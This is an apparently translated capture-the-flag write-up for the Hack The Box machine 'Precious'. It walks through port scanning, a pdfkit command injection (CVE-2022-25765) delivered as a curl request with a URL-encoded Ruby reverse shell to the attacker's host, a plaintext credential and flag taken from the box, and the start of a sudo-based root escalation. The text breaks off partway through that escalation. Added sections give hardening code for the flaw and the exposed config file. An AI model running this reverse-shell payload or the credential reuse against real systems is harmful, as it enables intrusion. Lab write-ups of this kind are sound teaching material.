Precious-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: command execution vulnerability, exploitation of CVE-2022-25765, password leakage in a configuration file, privilege escalation via a .yml + Ruby misconfiguration

Reference: https://0xdf.gitlab.io/2023/05/20/htb-precious.html

0x01 Obtaining user access

1. Get the target machine's IP address: 10.10.11.189

2. Check connectivity to the target

┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.11.189 -c 4
PING 10.10.11.189 (10.10.11.189) 56(84) bytes of data.
64 bytes from 10.10.11.189: icmp_seq=1 ttl=63 time=392 ms
64 bytes from 10.10.11.189: icmp_seq=2 ttl=63 time=308 ms
64 bytes from 10.10.11.189: icmp_seq=3 ttl=63 time=297 ms
64 bytes from 10.10.11.189: icmp_seq=4 ttl=63 time=357 ms

--- 10.10.11.189 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3008ms
rtt min/avg/max/mdev = 297.461/338.650/392.328/38.362 ms

3. Find the open ports

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn --min-rate=10000 -oG allport 10.10.11.189
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-29 15:48 CST
Nmap scan report for 10.10.11.189
Host is up (0.32s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 21.95 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80 -Pn --min-rate=10000 10.10.11.189
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-29 15:53 CST
Nmap scan report for 10.10.11.189
Host is up (0.30s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
| 256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_ 256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.98 seconds

4. Add the domain name found in the scan to /etc/hosts

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.11.189 precious.htb" | sudo tee -a /etc/hosts
10.10.11.189 precious.htb

5. Run a directory scan

┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dir -u http://precious.htb/ --wordlist=/usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://precious.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://precious.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_precious.htb/__23-12-29_16-04-37.txt

Target: http://precious.htb/

[16:04:37] Starting:

Task Completed

6. Run a subdomain scan as well

┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dns -d precious.htb -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: precious.htb
[+] Threads: 10
[+] Timeout: 1s
[+] Wordlist: /usr/share/dnsrecon/subdomains-top1mil-5000.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Progress: 5000 / 5001 (99.98%)
===============================================================
Finished
===============================================================

7. Nothing found, so let's look at the site's main page

8. This turns out to be a site that fetches a remote web page and renders it to PDF. Let's try appending a command to the URL and see whether it is executed:

POST / HTTP/1.1
Host: precious.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://precious.htb
Connection: close
Referer: http://precious.htb/
Upgrade-Insecure-Requests: 1

url=http://127.0.0.1 | id


HTTP/1.1 200 OK
Content-Type: application/pdf
Content-Length: 4595
Connection: close
Status: 200 OK
Content-Disposition: attachment; filename="gosi481kgref9k8ztjhu0xsftvzgh5j2.pdf"
Last-Modified: Fri, 29 Dec 2023 08:18:57 GMT
X-Content-Type-Options: nosniff
Date: Fri, 29 Dec 2023 08:18:57 GMT
X-Powered-By: Phusion Passenger(R) 6.0.15
Server: nginx/1.18.0 + Phusion Passenger(R) 6.0.15
X-Runtime: Ruby

%PDF-1.4
%âã
1 0 obj
<<
/Title ()
/Creator (þÿ
<<
/Size 11
/Info 1 0 R
/Root 2 0 R
>>
startxref
1039
%%EOF
%BeginExifToolUpdate
1 0 obj
<<
/Creator (Generated by pdfkit v0.8.6)
>>
endobj
11 0 obj
<<
/Type /Metadata
/Subtype /XML
/Length 2829
>>

9. The PDF metadata gives us the name and version of the generator. Searching Google turns up the following vulnerability information:

https://github.com/shamo0/PDFkit-CMD-Injection

CVE-2022-25765: command injection in pdfkit <0.8.6.

10. Try the exploit code for this vulnerability directly:

┌──(kali㉿kali)-[~/桌面]
└─$ curl 'precious.htb' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: precious.htb' -H 'Connection: keep-alive' -H 'Referer: precious.htb' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2F10.10.14.3%3A443%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%2210.10.14.3%22%2C443%29%29%27%60'
Warning: Binary output can mess up your terminal. Use "--output -" to tell
Warning: curl to output it to your terminal anyway, or consider "--output
Warning: <FILE>" to save to a file.

11. We successfully obtain an interactive shell:

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.189] 36212
id
uid=1001(ruby) gid=1001(ruby) groups=1001(ruby)
python3 -c 'import pty;pty.spawn("/bin/bash")'
ruby@precious:/var/www/pdfapp$ ls
ls
app config config.ru Gemfile Gemfile.lock pdf public
ruby@precious:/var/www/pdfapp$ ls -la
ls -la
total 36
drwxr-xr-x 6 root root 4096 Oct 26 2022 .
drwxr-xr-x 4 root root 4096 Oct 26 2022 ..
drwxr-xr-x 4 root ruby 4096 Oct 26 2022 app
drwxr-xr-x 2 root ruby 4096 Oct 26 2022 config
-rw-r--r-- 1 root ruby 59 Sep 10 2022 config.ru
-rw-r--r-- 1 root ruby 99 Sep 17 2022 Gemfile
-rw-r--r-- 1 root ruby 478 Sep 26 2022 Gemfile.lock
drwxrwxr-x 2 root ruby 4096 Dec 29 03:20 pdf
drwxr-xr-x 4 root ruby 4096 Oct 26 2022 public
ruby@precious:/var/www/pdfapp$ cat config.ru
cat config.ru
require_relative './config/environment'
run PdfControllers
ruby@precious:/var/www/pdfapp$ cd config
cd config
ruby@precious:/var/www/pdfapp/config$ ls
ls
environment.rb
ruby@precious:/var/www/pdfapp/config$ cat environment.rb
cat environment.rb
require 'bundler/setup'

APP_ENV = ENV["RACK_ENV"] || "development"

Bundler.require :default, APP_ENV.to_sym

require 'rubygems'
require 'bundler'

require_rel '../app'
ruby@precious:/var/www/pdfapp/config$ cd ../
cd ../
ruby@precious:/var/www/pdfapp$
ruby@precious:/var/www/pdfapp$ ls -la
ls -la
total 36
drwxr-xr-x 6 root root 4096 Oct 26 2022 .
drwxr-xr-x 4 root root 4096 Oct 26 2022 ..
drwxr-xr-x 4 root ruby 4096 Oct 26 2022 app
drwxr-xr-x 2 root ruby 4096 Oct 26 2022 config
-rw-r--r-- 1 root ruby 59 Sep 10 2022 config.ru
-rw-r--r-- 1 root ruby 99 Sep 17 2022 Gemfile
-rw-r--r-- 1 root ruby 478 Sep 26 2022 Gemfile.lock
drwxrwxr-x 2 root ruby 4096 Dec 29 03:20 pdf
drwxr-xr-x 4 root ruby 4096 Oct 26 2022 public
ruby@precious:/var/www/pdfapp$ ls -la /home
ls -la /home
total 16
drwxr-xr-x 4 root root 4096 Oct 26 2022 .
drwxr-xr-x 18 root root 4096 Nov 21 2022 ..
drwxr-xr-x 2 henry henry 4096 Oct 26 2022 henry
drwxr-xr-x 4 ruby ruby 4096 Dec 29 02:59 ruby
ruby@precious:/var/www/pdfapp$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for ruby:

Sorry, try again.
[sudo] password for ruby:

Sorry, try again.
[sudo] password for ruby:

sudo: 3 incorrect password attempts
ruby@precious:/var/www/pdfapp$

ruby@precious:/var/www/pdfapp$ ls -la
ls -la
total 36
drwxr-xr-x 6 root root 4096 Oct 26 2022 .
drwxr-xr-x 4 root root 4096 Oct 26 2022 ..
drwxr-xr-x 4 root ruby 4096 Oct 26 2022 app
drwxr-xr-x 2 root ruby 4096 Oct 26 2022 config
-rw-r--r-- 1 root ruby 59 Sep 10 2022 config.ru
-rw-r--r-- 1 root ruby 99 Sep 17 2022 Gemfile
-rw-r--r-- 1 root ruby 478 Sep 26 2022 Gemfile.lock
drwxrwxr-x 2 root ruby 4096 Dec 29 03:20 pdf
drwxr-xr-x 4 root ruby 4096 Oct 26 2022 public
ruby@precious:/var/www/pdfapp$ cd app
cd app
ruby@precious:/var/www/pdfapp/app$ ls -la
ls -la
total 16
drwxr-xr-x 4 root ruby 4096 Oct 26 2022 .
drwxr-xr-x 6 root root 4096 Oct 26 2022 ..
drwxr-xr-x 2 root ruby 4096 Oct 26 2022 controllers
drwxr-xr-x 2 root ruby 4096 Oct 26 2022 views
ruby@precious:/var/www/pdfapp/app$ cd controllers
cd controllers
ruby@precious:/var/www/pdfapp/app/controllers$ ls -la
ls -la
total 12
drwxr-xr-x 2 root ruby 4096 Oct 26 2022 .
drwxr-xr-x 4 root ruby 4096 Oct 26 2022 ..
-rw-r--r-- 1 root ruby 725 Sep 24 2022 pdf.rb
ruby@precious:/var/www/pdfapp/app/controllers$ cat pdf.rb
cat pdf.rb
class PdfControllers < Sinatra::Base

  configure do
    set :views, "app/views"
    set :public_dir, "public"
  end

  get '/' do
    erb :'index'
  end

  post '/' do
    url = ERB.new(params[:url]).result(binding)
    if url =~ /^https?:\/\//i
      filename = Array.new(32){rand(36).to_s(36)}.join + '.pdf'
      path = 'pdf/' + filename

      begin
        PDFKit.new(url).to_file(path)
        cmd = `exiftool -overwrite_original -all= -creator="Generated by pdfkit v0.8.6" -xmptoolkit= #{path}`
        send_file path, :disposition => 'attachment'
      rescue
        @msg = 'Cannot load remote URL!'
      end

    else
      @msg = 'You should provide a valid URL!'
    end
    erb :'index'
  end
end

ruby@precious:/var/www/pdfapp/app/controllers$


ruby@precious:/var/www/pdfapp/app/controllers$ cd ..
cd ..
ruby@precious:/var/www/pdfapp/app$ ls -la
ls -la
total 16
drwxr-xr-x 4 root ruby 4096 Oct 26 2022 .
drwxr-xr-x 6 root root 4096 Oct 26 2022 ..
drwxr-xr-x 2 root ruby 4096 Oct 26 2022 controllers
drwxr-xr-x 2 root ruby 4096 Oct 26 2022 views
ruby@precious:/var/www/pdfapp/app$ cd views
cd views
ruby@precious:/var/www/pdfapp/app/views$ ls -la
ls -la
total 12
drwxr-xr-x 2 root ruby 4096 Oct 26 2022 .
drwxr-xr-x 4 root ruby 4096 Oct 26 2022 ..
-rw-r--r-- 1 root ruby 494 Sep 10 2022 index.erb
ruby@precious:/var/www/pdfapp/app/views$ cat index.erb
cat index.erb
<!DOCTYPE html>
<html>
<head>
<title>Convert Web Page to PDF</title>
<link rel="stylesheet" href="stylesheets/style.css">
</head>
<body>
<div class="wrapper">
<h1 class="title">Convert Web Page to PDF</h1>
<form action="/" method="post">
<p>Enter URL to fetch</p><br>
<input type="text" name="url" value="">
<input type="submit" value="Submit">
</form>
<h2 class="msg"><%= @msg %></h2>
</div>
</body>
</html>
ruby@precious:/var/www/pdfapp/app/views$ cd ../
cd ../
ruby@precious:/var/www/pdfapp/app$ ls -la
ls -la
total 16
drwxr-xr-x 4 root ruby 4096 Oct 26 2022 .
drwxr-xr-x 6 root root 4096 Oct 26 2022 ..
drwxr-xr-x 2 root ruby 4096 Oct 26 2022 controllers
drwxr-xr-x 2 root ruby 4096 Oct 26 2022 views
ruby@precious:/var/www/pdfapp/app$ cd ../
cd ../
ruby@precious:/var/www/pdfapp$ ls -la
ls -la
total 36
drwxr-xr-x 6 root root 4096 Oct 26 2022 .
drwxr-xr-x 4 root root 4096 Oct 26 2022 ..
drwxr-xr-x 4 root ruby 4096 Oct 26 2022 app
drwxr-xr-x 2 root ruby 4096 Oct 26 2022 config
-rw-r--r-- 1 root ruby 59 Sep 10 2022 config.ru
-rw-r--r-- 1 root ruby 99 Sep 17 2022 Gemfile
-rw-r--r-- 1 root ruby 478 Sep 26 2022 Gemfile.lock
drwxrwxr-x 2 root ruby 4096 Dec 29 03:20 pdf
drwxr-xr-x 4 root ruby 4096 Oct 26 2022 public
ruby@precious:/var/www/pdfapp$ cat Gemfile
cat Gemfile
source "http://rubygems.org"

#gem 'shotgun'
gem "sinatra"
gem 'require_all'
gem "pdfkit", "0.8.6"
ruby@precious:/var/www/pdfapp$ cat Gemfile.lock
cat Gemfile.lock
GEM
remote: http://rubygems.org/
specs:
mustermann (3.0.0)
ruby2_keywords (~> 0.0.1)
pdfkit (0.8.6)
rack (2.2.4)
rack-protection (3.0.0)
rack
require_all (3.0.0)
ruby2_keywords (0.0.5)
sinatra (3.0.0)
mustermann (~> 3.0)
rack (~> 2.2, >= 2.2.4)
rack-protection (= 3.0.0)
tilt (~> 2.0)
tilt (2.0.11)

PLATFORMS
x86_64-linux

DEPENDENCIES
pdfkit (= 0.8.6)
require_all
sinatra

BUNDLED WITH
2.3.22
ruby@precious:/var/www/pdfapp$ cd pdf
cd pdf
ruby@precious:/var/www/pdfapp/pdf$ ls
ls
ruby@precious:/var/www/pdfapp/pdf$ cd ../
cd ../
ruby@precious:/var/www/pdfapp$ cd public
cd public
ruby@precious:/var/www/pdfapp/public$ ls
ls
images stylesheets
ruby@precious:/var/www/pdfapp/public$ ls -la
ls -la
total 16
drwxr-xr-x 4 root ruby 4096 Oct 26 2022 .
drwxr-xr-x 6 root root 4096 Oct 26 2022 ..
drwxr-xr-x 2 root ruby 4096 Oct 26 2022 images
drwxr-xr-x 2 root ruby 4096 Oct 26 2022 stylesheets
ruby@precious:/var/www/pdfapp/public$ cd images
cd images
ruby@precious:/var/www/pdfapp/public/images$ ls
ls
ruby@precious:/var/www/pdfapp/public/images$ cd ../
cd ../
ruby@precious:/var/www/pdfapp/public$ cd stylesheets
cd stylesheets
ruby@precious:/var/www/pdfapp/public/stylesheets$ ls
ls
style.css
ruby@precious:/var/www/pdfapp/public/stylesheets$ cd ../../
cd ../../
ruby@precious:/var/www/pdfapp$ cd ../
cd ../
ruby@precious:/var/www$ ls -la
ls -la
total 16
drwxr-xr-x 4 root root 4096 Oct 26 2022 .
drwxr-xr-x 12 root root 4096 Oct 26 2022 ..
drwxr-xr-x 2 root root 4096 Oct 26 2022 html
drwxr-xr-x 6 root root 4096 Oct 26 2022 pdfapp
ruby@precious:/var/www$ cd html
cd html
ruby@precious:/var/www/html$ ls -la
ls -la
total 12
drwxr-xr-x 2 root root 4096 Oct 26 2022 .
drwxr-xr-x 4 root root 4096 Oct 26 2022 ..
-rw-r--r-- 1 root root 612 Sep 26 2022 index.nginx-debian.html
ruby@precious:/var/www/html$ cat index.nginx-debian.html
cat index.nginx-debian.html
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
body {
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>
ruby@precious:/var/www/html$


ruby@precious:/var/www/html$ cd /etc/nginx/
cd /etc/nginx/
ruby@precious:/etc/nginx$ ls -la
ls -la
total 72
drwxr-xr-x 8 root root 4096 Nov 21 2022 .
drwxr-xr-x 79 root root 4096 Dec 29 02:44 ..
drwxr-xr-x 2 root root 4096 Oct 26 2022 conf.d
-rw-r--r-- 1 root root 1125 May 29 2021 fastcgi.conf
-rw-r--r-- 1 root root 1055 May 29 2021 fastcgi_params
-rw-r--r-- 1 root root 2837 May 29 2021 koi-utf
-rw-r--r-- 1 root root 2223 May 29 2021 koi-win
-rw-r--r-- 1 root root 3957 May 29 2021 mime.types
drwxr-xr-x 2 root root 4096 Oct 26 2022 modules-available
drwxr-xr-x 2 root root 4096 Oct 26 2022 modules-enabled
-rw-r--r-- 1 root root 1447 May 29 2021 nginx.conf
-rw-r--r-- 1 root root 180 May 29 2021 proxy_params
-rw-r--r-- 1 root root 636 May 29 2021 scgi_params
drwxr-xr-x 2 root root 4096 Nov 21 2022 sites-available
drwxr-xr-x 2 root root 4096 Oct 26 2022 sites-enabled
drwxr-xr-x 2 root root 4096 Nov 21 2022 snippets
-rw-r--r-- 1 root root 664 May 29 2021 uwsgi_params
-rw-r--r-- 1 root root 3071 May 29 2021 win-utf
ruby@precious:/etc/nginx$ cat nginx.conf
cat nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
worker_connections 768;
# multi_accept on;
}

http {

##
# Basic Settings
##

sendfile on;
tcp_nopush on;
types_hash_max_size 2048;
# server_tokens off;

# server_names_hash_bucket_size 64;
# server_name_in_redirect off;

include /etc/nginx/mime.types;
default_type application/octet-stream;

##
# SSL Settings
##

ssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3; # Dropping SSLv3, ref: POODLE
ssl_prefer_server_ciphers on;

##
# Logging Settings
##

access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;

##
# Gzip Settings
##

gzip on;

# gzip_vary on;
# gzip_proxied any;
# gzip_comp_level 6;
# gzip_buffers 16 8k;
# gzip_http_version 1.1;
# gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

##
# Virtual Host Configs
##

include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}


#mail {
# # See sample authentication script at:
# # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
#
# # auth_http localhost/auth.php;
# # pop3_capabilities "TOP" "USER";
# # imap_capabilities "IMAP4rev1" "UIDPLUS";
#
# server {
# listen localhost:110;
# protocol pop3;
# proxy on;
# }
#
# server {
# listen localhost:143;
# protocol imap;
# proxy on;
# }
#}
ruby@precious:/etc/nginx$ cd conf.d
cd conf.d
ruby@precious:/etc/nginx/conf.d$ ls -la
ls -la
total 12
drwxr-xr-x 2 root root 4096 Oct 26 2022 .
drwxr-xr-x 8 root root 4096 Nov 21 2022 ..
-rw-r--r-- 1 root root 259 Sep 18 2022 mod-http-passenger.conf
ruby@precious:/etc/nginx/conf.d$ cat mod-http-passenger.conf
cat mod-http-passenger.conf
### Begin automatically installed Phusion Passenger config snippet ###
passenger_root /usr/lib/ruby/vendor_ruby/phusion_passenger/locations.ini;
passenger_ruby /usr/bin/passenger_free_ruby;
### End automatically installed Phusion Passenger config snippet ###
ruby@precious:/etc/nginx/conf.d$ cat /usr/lib/ruby/vendor_ruby/phusion_passenger/locations.ini
<ib/ruby/vendor_ruby/phusion_passenger/locations.ini
[locations]
packaging_method=deb
bin_dir=/usr/bin
support_binaries_dir=/usr/lib/passenger/support-binaries
lib_dir=/usr/lib/passenger
helper_scripts_dir=/usr/share/passenger/helper-scripts
resources_dir=/usr/share/passenger
include_dir=/usr/share/passenger/include
doc_dir=/usr/share/doc/passenger
ruby_libdir=/usr/lib/ruby/vendor_ruby
node_libdir=/usr/share/passenger/node
apache2_module_path=/usr/lib/apache2/modules/mod_passenger.so
ruby_extension_source_dir=/usr/share/passenger/ruby_extension_source
nginx_module_source_dir=/usr/share/passenger/ngx_http_passenger_module
ruby@precious:/etc/nginx/conf.d$ cat /usr/bin/passenger_free_ruby
ruby@precious:~$ ss -ltn
ss -ltn
State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 500 127.0.0.1:43323 0.0.0.0:*
LISTEN 0 511 [::]:80 [::]:*
LISTEN 0 128 [::]:22 [::]:*
ruby@precious:~$ ss -lt
ss -lt
State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
LISTEN 0 511 0.0.0.0:http 0.0.0.0:*
LISTEN 0 128 0.0.0.0:ssh 0.0.0.0:*
LISTEN 0 500 127.0.0.1:43323 0.0.0.0:*
LISTEN 0 511 [::]:http [::]:*
LISTEN 0 128 [::]:ssh [::]:*
ruby@precious:~$ curl 127.0.0.1:43323
curl 127.0.0.1:43323
curl: (52) Empty reply from server
ruby@precious:~$
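The controller source above (pdf.rb) only checks that the submitted value begins with http:// or https:// and then hands it to PDFKit.new(url); the pdfkit 0.8.6 pinned in the Gemfile builds the wkhtmltopdf command line as a shell string, so anything after a valid scheme reaches the shell (CVE-2022-25765). It also evaluates the raw parameter as an ERB template before the check. The Ruby below is an added example, not code from the box or from the pdfkit gem: it shows the original check beside a strict one and an argv-based invocation that keeps the URL out of any shell. SHELL_META, safe_url?, build_argv and the wkhtmltopdf option set are assumptions of this example.

```ruby
require "uri"

# Added example (not code from the box or from the pdfkit gem). pdf.rb only
# checks that the submitted value starts with http:// or https://, then
# passes it to PDFKit.new(url); pdfkit 0.8.6 builds the wkhtmltopdf command
# line as a shell string, so anything after a valid scheme reaches the
# shell (CVE-2022-25765). The checks below are assumptions about what a
# hardened controller would do, not the upstream fix.

# Characters that must never reach a shell-built command line.
SHELL_META = /[`$|;&<>()\\'"\s]/

# The original test from pdf.rb, kept only so the two can be compared.
# Note that the controller also runs the raw parameter through ERB first;
# a hardened version uses params[:url] directly and drops that step.
def legacy_url_ok?(url)
  !!(url =~ /^https?:\/\//i)
end

# Strict validation: reject shell metacharacters in the decoded value,
# require the URI library to parse it as http(s) with a host, and refuse
# embedded credentials.
def safe_url?(raw)
  return false if raw.nil? || raw.length > 2048
  return false if raw =~ SHELL_META
  uri = URI.parse(raw)
  return false unless uri.is_a?(URI::HTTP)   # URI::HTTPS is a subclass
  return false if uri.host.nil? || uri.host.empty?
  return false unless uri.userinfo.nil?
  true
rescue URI::InvalidURIError
  false
end

# Build the converter invocation as an argv array. Handing an array to
# Process.spawn or Open3.capture2 makes the URL one argument that no shell
# re-parses, which is the property the vulnerable version lacked.
# "--quiet" is a real wkhtmltopdf flag; the rest of the option set is
# left to the deployment.
def build_argv(url, out_path)
  raise ArgumentError, "rejected URL" unless safe_url?(url)
  ["wkhtmltopdf", "--quiet", url, out_path]
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs: the probe from the request above and a clean URL.
  ["http://127.0.0.1 | id", "http://example.com/"].each do |u|
    puts "#{u.inspect}: legacy=#{legacy_url_ok?(u)} strict=#{safe_url?(u)}"
  end
end
```

The probe from step 8 passes legacy_url_ok? and fails safe_url?. Rejecting `&` is a deliberate trade-off: URLs with more than one query parameter are refused, which is acceptable for a service whose only job is to render a page. The argv form is the real fix; the metacharacter filter is a second layer for the case where some later component still builds a shell string.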

12. While searching around the way I usually do, I found a file in the current user's home directory containing a username and password

ruby@precious:/var/www/pdfapp/config$ cd ~
cd ~
ruby@precious:~$ ls -la
ls -la
total 76
drwxr-xr-x 4 ruby ruby 4096 Dec 29 03:53 .
drwxr-xr-x 4 root root 4096 Oct 26 2022 ..
lrwxrwxrwx 1 root root 9 Oct 26 2022 .bash_history -> /dev/null
-rw-r--r-- 1 ruby ruby 220 Mar 27 2022 .bash_logout
-rw-r--r-- 1 ruby ruby 3526 Mar 27 2022 .bashrc
dr-xr-xr-x 2 root ruby 4096 Oct 26 2022 .bundle
drwxr-xr-x 3 ruby ruby 4096 Dec 29 02:59 .cache
-rwxr-xr-x 1 ruby ruby 46631 Jan 7 2020 LinEnum.sh
-rw-r--r-- 1 ruby ruby 807 Mar 27 2022 .profile
ruby@precious:~$ cd .bundle
cd .bundle
ruby@precious:~/.bundle$ ls -la
ls -la
total 12
dr-xr-xr-x 2 root ruby 4096 Oct 26 2022 .
drwxr-xr-x 4 ruby ruby 4096 Dec 29 03:53 ..
-r-xr-xr-x 1 root ruby 62 Sep 26 2022 config
ruby@precious:~/.bundle$ cat config
cat config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"
ruby@precious:~/.bundle$
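The file above is Bundler's per-user config: each per-source credential is written under a key derived from the source URL (dots become "__"), so the password sits in plaintext for anyone who can read the file, and here the same password is also henry's login. The Ruby below is an added example, not part of the box or of Bundler, that audits such a file and reports credential-bearing entries without copying the password into its output. The one-pair-per-line parse and the sample with a placeholder password are assumptions of this example.

```ruby
# Added example, not part of the box or of Bundler. Bundler writes each
# per-source credential into .bundle/config under a key derived from the
# source URL (dots become "__"), e.g.
#   BUNDLE_HTTPS://RUBYGEMS__ORG/: "user:password"
# so the secret sits in plaintext for anyone who can read the file. This
# audit reports such entries without copying the password into its output.
# Treating the file as one key/value pair per line is an assumption of
# this example.

CONFIG_LINE = /\A(BUNDLE_.+?):\s+(['"]?)(.*)\2\z/
CRED_KEY    = /\ABUNDLE_HTTPS?:\/\/(.+)\/\z/i
USER_PASS   = /\A([^:]+):(.+)\z/

# Returns one finding per credential-bearing key: the key, the source host
# it belongs to, the user name, and only the length of the password.
def audit_bundle_config(text)
  text.each_line.filter_map do |line|
    m = CONFIG_LINE.match(line.chomp)
    next unless m
    key, value = m[1], m[3]
    host = CRED_KEY.match(key)
    next unless host
    up = USER_PASS.match(value)
    next unless up
    {
      key: key,
      host: host[1].gsub("__", ".").downcase,
      user: up[1],
      password_length: up[2].length,
    }
  end
end

# Constructed sample mirroring the file found on the box; the password is
# a placeholder, not the real value.
SAMPLE_CONFIG = <<~YAML
  ---
  BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:REDACTED_PASSWORD"
  BUNDLE_PATH: "vendor/bundle"
YAML

if __FILE__ == $PROGRAM_NAME
  audit_bundle_config(SAMPLE_CONFIG).each do |f|
    puts "#{f[:key]} stores a #{f[:password_length]}-char password for #{f[:user]}@#{f[:host]}"
  end
end
```

Bundler reads the same credential from the environment variable BUNDLE_RUBYGEMS__ORG, so a service account can have it injected at run time instead of keeping it in a file readable by the web application's user; a separate credential for the service account would also have kept the leak from becoming an SSH login.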

13. Log in directly with these credentials and obtain the first flag

┌──(kali㉿kali)-[~/桌面]
└─$ ssh henry@10.10.11.189
henry@10.10.11.189's password:
Linux precious 5.10.0-19-amd64 #1 SMP Debian 5.10.149-2 (2022-10-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
henry@precious:~$ ls
user.txt
henry@precious:~$ cat user.txt
149b5b288b64f28dba45240787cf62c9

0x02 Obtaining system (root) access

14. Check the output of sudo -l

henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
(root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

15. Next, look at this file

henry@precious:~$ ls -la /opt/update_dependencies.rb
-rwxr-xr-x 1 root root 848 Sep 25 2022 /opt/update_dependencies.rb
henry@precious:~$ cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
  YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
  Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
